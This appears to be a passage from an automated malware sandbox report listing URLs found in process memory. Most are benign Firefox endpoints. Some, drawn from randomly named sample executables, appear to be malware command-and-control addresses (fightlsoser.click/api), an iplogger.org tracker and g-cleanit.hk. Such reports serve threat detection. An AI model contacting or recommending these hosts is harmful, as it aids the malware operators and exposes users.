                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsjar
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                          Source: firefox.exe, 00000018.00000002.3309103375.000001C7B19B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586558743.000001C7B111F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3279856715.000001C7B1470000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2586899171.000001C7B115A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3771127576.0000155FFDC04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2579118375.000001C7B0F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2603431125.000001C7B108D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3756484756.0000025192304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: firefox.exe, 00000018.00000003.2591625620.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2603859381.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3190084516.000001C7B0913000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
                          Source: firefox.exe, 00000018.00000003.2591625620.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2603859381.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3190084516.000001C7B0913000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                          Source: 6f9ea40b81.exe, 00000008.00000002.3716921801.000000000118E000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3537605432.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click/
                          Source: 6f9ea40b81.exe, 00000008.00000003.3485076442.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3537605432.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click/8
                          Source: 6f9ea40b81.exe, 00000008.00000003.3612914512.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click/P
                          Source: 6f9ea40b81.exe, 00000008.00000003.3481257535.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3571231031.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000002.3717543202.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3538983714.000000000118E000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000002.3716921801.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3438146483.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3363688901.000000000118E000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000002.3716921801.000000000118E000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3439382191.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3672495425.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3134220908.00000000011EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click/api
                          Source: 6f9ea40b81.exe, 00000008.00000003.3571231031.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000002.3717543202.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click/apiW
                          Source: 6f9ea40b81.exe, 00000008.00000002.3716921801.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3672495425.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click/apio
                          Source: 6f9ea40b81.exe, 00000008.00000003.3485076442.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3537605432.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click/atX
                          Source: 6f9ea40b81.exe, 00000008.00000002.3716582556.000000000116C000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3641190528.000000000116C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fightlsoser.click:443/api
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD726000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordstrans
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1Parent
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2908490881.000001C7ACEF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
                          Source: 09be480dc7.exe, 00000024.00000003.4011728314.000000000596F000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4078633256.0000000005690000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4013401438.000000000596F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g-cleanit.hk
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 00000018.00000002.3136752338.000001C7AE603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                          Source: firefox.exe, 00000018.00000003.2586558743.000001C7B111F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3279856715.000001C7B1470000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2586899171.000001C7B115A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2579118375.000001C7B0F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotsresource://pdf.js/
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2811533571.000001C7A1611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881No
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ideas.mozilla.org/
                          Source: firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 00000018.00000002.2908490881.000001C7ACEF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://install.mozilla.org
                          Source: 09be480dc7.exe, 00000024.00000003.4011728314.000000000596F000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4078633256.0000000005690000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4013401438.000000000596F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1Pz8p7
                          Source: firefox.exe, 00000018.00000002.3309103375.000001C7B1998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com
                          Source: firefox.exe, 00000018.00000002.3309103375.000001C7B19B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD7E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%Allowing
                          Source: firefox.exe, 00000018.00000002.3309103375.000001C7B1967000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                          Source: firefox.exe, 00000018.00000003.2591625620.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2603859381.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE3CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3190084516.000001C7B0913000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3136752338.000001C7AE621000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sFailed
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://gre/modules/handlers/HandlerList.sys.mj
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                          Source: firefox.exe, 00000018.00000003.2591625620.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2603859381.000001C7B0933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3190084516.000001C7B0913000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                          Source: firefox.exe, 00000018.00000002.2811533571.000001C7A16D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311A72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource:///modules/UrlbarProvidersManager.sys.mjs
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mitmdetection.services.mozilla.com/
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/about
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/breach-details/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
